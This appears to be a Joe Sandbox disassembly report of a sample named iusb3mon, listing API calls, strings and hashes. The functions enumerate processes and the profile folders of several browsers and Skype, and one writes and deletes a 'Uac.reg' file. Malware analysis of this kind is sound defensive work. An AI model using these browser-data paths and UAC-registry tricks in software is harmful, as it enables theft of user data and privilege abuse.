Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
API String ID: 12226711-2055279553
Opcode ID: b9c87f559a4aa869cdb17839a030c5a4d1450b1415ca4fea6bf852edf29342fd
Instruction ID: db76760270e53dd8c998b6b75d80c3c811cefdaa47127151f545fa7be555b240
Opcode Fuzzy Hash: b9c87f559a4aa869cdb17839a030c5a4d1450b1415ca4fea6bf852edf29342fd
Instruction Fuzzy Hash: DD116371D50219FAEF95EBE0DD46FEEB7B8EF18700F104155A221B72C0DBB45B089A61

Function 06CF4A1D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF4A22

Part of subcall function 06CF3441: __EH_prolog.LIBCMT ref: 06CF3446
Part of subcall function 06CF3441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF345C
Part of subcall function 06CF3441: Process32First.KERNEL32(00000000,?), ref: 06CF3475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06CF4A50

Part of subcall function 06D087FB: lstrlenA.KERNEL32(?), ref: 06D0883F

Part of subcall function 06D08633: __EH_prolog.LIBCMT ref: 06D08638

Part of subcall function 06D085BF: __EH_prolog.LIBCMT ref: 06D085C4

Part of subcall function 06D084B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 06D084C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?), ref: 06CF4AAC

Part of subcall function 06CF2E2C: __EH_prolog.LIBCMT ref: 06CF2E31
Part of subcall function 06CF2E2C: FindFirstFileA.KERNEL32(?,?), ref: 06CF2EBF
Part of subcall function 06CF2E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06CF2F7F

Strings

\AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 06CF4A88
C:\Users\, xrefs: 06CF4A7D
QQBrowser.exe, xrefs: 06CF4A33

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
API String ID: 12226711-2662846904
Opcode ID: bbbbb5784b0a2580a9f74ac9fcd91eba515edc7ae280ba6dda69ee3dbcb5e990
Instruction ID: 1c9b7cea8a9267e1acfcdfa94eebb95d53ee898984b2b14484c5e8c4972b034d
Opcode Fuzzy Hash: bbbbb5784b0a2580a9f74ac9fcd91eba515edc7ae280ba6dda69ee3dbcb5e990
Instruction Fuzzy Hash: 5F116371D50219BAEF95EBE0DD46FEEB7B8EF18700F104155E221B62C0DBB45B089A61

Function 06CF4BA9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF4BAE

Part of subcall function 06CF3441: __EH_prolog.LIBCMT ref: 06CF3446
Part of subcall function 06CF3441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF345C
Part of subcall function 06CF3441: Process32First.KERNEL32(00000000,?), ref: 06CF3475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06CF4BDC

Part of subcall function 06D087FB: lstrlenA.KERNEL32(?), ref: 06D0883F

Part of subcall function 06D08633: __EH_prolog.LIBCMT ref: 06D08638

Part of subcall function 06D085BF: __EH_prolog.LIBCMT ref: 06D085C4

Part of subcall function 06D084B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 06D084C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 06CF4C38

Part of subcall function 06CF2E2C: __EH_prolog.LIBCMT ref: 06CF2E31
Part of subcall function 06CF2E2C: FindFirstFileA.KERNEL32(?,?), ref: 06CF2EBF
Part of subcall function 06CF2E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06CF2F7F

Strings

C:\Users\, xrefs: 06CF4C09
chrome.exe, xrefs: 06CF4BBF
\AppData\Local\Google\Chrome\User Data\Default, xrefs: 06CF4C14

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 12226711-2559963756
Opcode ID: 25b0a5715a14e4cd7b9259d08ac548485c15d2f840dd49c406f6985595b331d3
Instruction ID: 53436702c7ee3ba1490623f7d35c021089c8d860cc11f3f5a17849623d15b505
Opcode Fuzzy Hash: 25b0a5715a14e4cd7b9259d08ac548485c15d2f840dd49c406f6985595b331d3
Instruction Fuzzy Hash: C9116372D50219FAEF95EBE0DD46FEEB7B8EF18700F104155A221B62C0DBB45B089A61

Function 06CF485C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF4861

Part of subcall function 06CF3441: __EH_prolog.LIBCMT ref: 06CF3446
Part of subcall function 06CF3441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF345C
Part of subcall function 06CF3441: Process32First.KERNEL32(00000000,?), ref: 06CF3475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06CF488F

Part of subcall function 06D087FB: lstrlenA.KERNEL32(?), ref: 06D0883F

Part of subcall function 06D08633: __EH_prolog.LIBCMT ref: 06D08638

Part of subcall function 06D085BF: __EH_prolog.LIBCMT ref: 06D085C4

Part of subcall function 06D084B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 06D084C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,?,C:\Users\,?), ref: 06CF48EB

Part of subcall function 06CF2E2C: __EH_prolog.LIBCMT ref: 06CF2E31
Part of subcall function 06CF2E2C: FindFirstFileA.KERNEL32(?,?), ref: 06CF2EBF
Part of subcall function 06CF2E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06CF2F7F

Strings

C:\Users\, xrefs: 06CF48BC
\AppData\Roaming\Microsoft\Skype for Desktop, xrefs: 06CF48C7
Skype.exe, xrefs: 06CF4872

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
API String ID: 12226711-3499480952
Opcode ID: 08477e4a59e718d39570af51a737dfb49cdd61f1f9b079327310d15b0bb400f5
Instruction ID: 50edd292f783542fd4e0b2d6b2f39439aca711fb756ce6eb9cb97b123c544487
Opcode Fuzzy Hash: 08477e4a59e718d39570af51a737dfb49cdd61f1f9b079327310d15b0bb400f5
Instruction Fuzzy Hash: CB119371D40209BAEF95EBE0DD46FEEBBB9EF18300F104115A221B22C0DBB45B089A61

Function 06CF4957 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF495C

Part of subcall function 06CF3441: __EH_prolog.LIBCMT ref: 06CF3446
Part of subcall function 06CF3441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF345C
Part of subcall function 06CF3441: Process32First.KERNEL32(00000000,?), ref: 06CF3475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06CF498A

Part of subcall function 06D087FB: lstrlenA.KERNEL32(?), ref: 06D0883F

Part of subcall function 06D08633: __EH_prolog.LIBCMT ref: 06D08638

Part of subcall function 06D085BF: __EH_prolog.LIBCMT ref: 06D085C4

Part of subcall function 06D084B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 06D084C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\360se6\User Data\Default,?,C:\Users\,?), ref: 06CF49E6

Part of subcall function 06CF2E2C: __EH_prolog.LIBCMT ref: 06CF2E31
Part of subcall function 06CF2E2C: FindFirstFileA.KERNEL32(?,?), ref: 06CF2EBF
Part of subcall function 06CF2E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06CF2F7F

Strings

C:\Users\, xrefs: 06CF49B7
\AppData\Roaming\360se6\User Data\Default, xrefs: 06CF49C2
360se6.exe, xrefs: 06CF496D

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
API String ID: 12226711-1244823433
Opcode ID: 7f8ec1fe094fb33c1f545352f3610aa5ade1e62f7b67ab41ea0046c68e7fb90c
Instruction ID: 4813d30c6c14d32c1d8e3b8bb4d846f47d633a98964b069cb4fa7db6e456e1e7
Opcode Fuzzy Hash: 7f8ec1fe094fb33c1f545352f3610aa5ade1e62f7b67ab41ea0046c68e7fb90c
Instruction Fuzzy Hash: 97119371D40209BBEF95EBE0DD46FEEBBB8EF18300F104155E221B22C0DBB45B089A61

Function 06CF3C01 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 06CF3C3D
CopyFileA.KERNEL32(?,?,00000000), ref: 06CF3C53

Part of subcall function 06CF3BBA: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 06CF3BD0
Part of subcall function 06CF3BBA: WriteFile.KERNEL32(00000000,06D15588,000000F5,?,00000000), ref: 06CF3BE8
Part of subcall function 06CF3BBA: CloseHandle.KERNEL32(00000000), ref: 06CF3BF5

Sleep.KERNEL32(?), ref: 06CF3C72
Sleep.KERNEL32(000003E8), ref: 06CF3C79
DeleteFileA.KERNEL32(Uac.reg), ref: 06CF3C80

Strings

Uac.reg, xrefs: 06CF3C0A, 06CF3C7B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Sleep$CloseCopyCreateDeleteHandleModuleNameWrite
String ID: Uac.reg
API String ID: 3965208581-763348774
Opcode ID: 8cecede13a73780551f4ed4b0bc96ec6aa8b3d92a0bf2e21d394946be334d6ba
Instruction ID: dc72e9b8db294f90fd9860987cc2f8975e9518bf008aaba149b141ce6f96f9ac
Opcode Fuzzy Hash: 8cecede13a73780551f4ed4b0bc96ec6aa8b3d92a0bf2e21d394946be334d6ba
Instruction Fuzzy Hash: 36016272A00219AFEB649FB4DC49FCE7BBDEB04310F0005A2E349E6290DAB05689CF51

Function 06D0B5EE Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 06D0B5FA
GetSysColor.USER32(00000010), ref: 06D0B601
GetSysColor.USER32(00000014), ref: 06D0B608
GetSysColor.USER32(00000012), ref: 06D0B60F
GetSysColor.USER32(00000006), ref: 06D0B616
GetSysColorBrush.USER32(0000000F), ref: 06D0B623
GetSysColorBrush.USER32(00000006), ref: 06D0B62A

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: e4dcbfb168770871eb318ea3d01d398c3f15ed8c0d67f0f5dc98af2a4c947e08
Instruction ID: 989743b1cddc2411b4d4098e0e063e3e5cdad3e6816cc2cb99dcbf805901a030
Opcode Fuzzy Hash: e4dcbfb168770871eb318ea3d01d398c3f15ed8c0d67f0f5dc98af2a4c947e08
Instruction Fuzzy Hash: A1F0F8719407489BE730AB729909B47BAE1FFC4B10F020D2EE2858BA90E6B5A4409F40

Function 00C05674 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,00C287D3,?,?,bad locale name), ref: 00C056BD
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,00C287D3,?,?,bad locale name), ref: 00C05728
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00C287D3,?,?,bad locale name), ref: 00C05745
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00C287D3,?,?,bad locale name), ref: 00C05784
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00C287D3,?,?,bad locale name), ref: 00C057E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,00C287D3,?,?,bad locale name), ref: 00C05806

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 2f165e3555114b4e6b1eceab88e96b8e6f294a54a78f250d3d194f5b9261d910
Instruction ID: 03e88dbfff53fb1e89f95e60e0994e87de8cbd0024dcbe3ae073b4d145846f5e
Opcode Fuzzy Hash: 2f165e3555114b4e6b1eceab88e96b8e6f294a54a78f250d3d194f5b9261d910
Instruction Fuzzy Hash: 2751AC7255061AAFEF208F65CC44FAB7BA9EF44B50F108529FD159A1E0D7318E10EFA0

Function 00C02DE0 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C02E36
std::_Lockit::_Lockit.LIBCPMT ref: 00C02E58
std::_Lockit::~_Lockit.LIBCPMT ref: 00C02E78
std::_Facet_Register.LIBCPMT ref: 00C02EE5
std::_Lockit::~_Lockit.LIBCPMT ref: 00C02F01
Concurrency::cancel_current_task.LIBCPMT ref: 00C02F61

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 9e616058b68bba6e52bc1afd7f14d575d5c66f953d2d4414db0ffffd0acfde26
Instruction ID: 1dc798038e675b49cd7cf09bc813d314078a108f1afe8947127aeae00bad9338
Opcode Fuzzy Hash: 9e616058b68bba6e52bc1afd7f14d575d5c66f953d2d4414db0ffffd0acfde26
Instruction Fuzzy Hash: C0516F71A00254CFCB21DF98D884BAEBBB4FF08720F144199E816AB3D1DB30AE05CB91

Function 06D01CDF Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,06D0E7F0,00000001,?,7622E860,06D2893C,?,?,00000002,00000000,?,?,06D03769,?), ref: 06D01D1E
GetStringTypeA.KERNEL32(00000000,00000001,06D26150,00000001,?,?,?,06D03769,?), ref: 06D01D38
GetStringTypeA.KERNEL32(?,?,?,00000000,00000002,7622E860,06D2893C,?,?,00000002,00000000,?,?,06D03769,?), ref: 06D01D6C
MultiByteToWideChar.KERNEL32(?,06D2893D,?,00000000,00000000,00000000,7622E860,06D2893C,?,?,00000002,00000000,?,?,06D03769,?), ref: 06D01DA4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 06D01DFA
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 06D01E0C

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: b3d49c58b3df0b1b1d1db3dec905a06b53feb7583f8d039453d6e7f3e1a9b57c
Instruction ID: 024cd8ad6e7060c2c968140fdc56fd657952b3cce7ad83fff8c99c0e44b26981
Opcode Fuzzy Hash: b3d49c58b3df0b1b1d1db3dec905a06b53feb7583f8d039453d6e7f3e1a9b57c
Instruction Fuzzy Hash: 1B416C71900259AFEF609F94CC85EEF7BBAFB09750F144525FA11D2290D331C954CBA1

Function 06D0C729 Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,06D26588,00000000,?,00000000,?,06D0C89F,06D26588,00000000,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773), ref: 06D0C734
EnterCriticalSection.KERNEL32(0000001C,00000010,?,00000000,?,06D0C89F,06D26588,00000000,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773,?), ref: 06D0C783
LeaveCriticalSection.KERNEL32(0000001C,00000000,?,00000000,?,06D0C89F,06D26588,00000000,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773,?), ref: 06D0C796
LocalAlloc.KERNEL32(00000000,?,?,00000000,?,06D0C89F,06D26588,00000000,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773,?), ref: 06D0C7AC
LocalReAlloc.KERNEL32(?,?,00000002,?,00000000,?,06D0C89F,06D26588,00000000,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773), ref: 06D0C7BE
TlsSetValue.KERNEL32(00000000,00000000,00000100), ref: 06D0C7FA

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: 4983682308ae7e0cff82c27c602e7ba871fa87981761b2efee6139c4a9886c8d
Instruction ID: 586d6d6610225f472375150b90204bec11148b53ac9fec27297625762f796d79
Opcode Fuzzy Hash: 4983682308ae7e0cff82c27c602e7ba871fa87981761b2efee6139c4a9886c8d
Instruction Fuzzy Hash: 1A317C35510605AFF7A4DF14C889F66B7B9FF85760F008A19E56AC7680D770E809CB61

Function 06D09ED2 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06D09ED7
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 06D09F24
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 06D09F46
GetCapture.USER32 ref: 06D09F58
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 06D09F67
WinHelpA.USER32(?,?,?,?), ref: 06D09F7B

Memory Dump Source

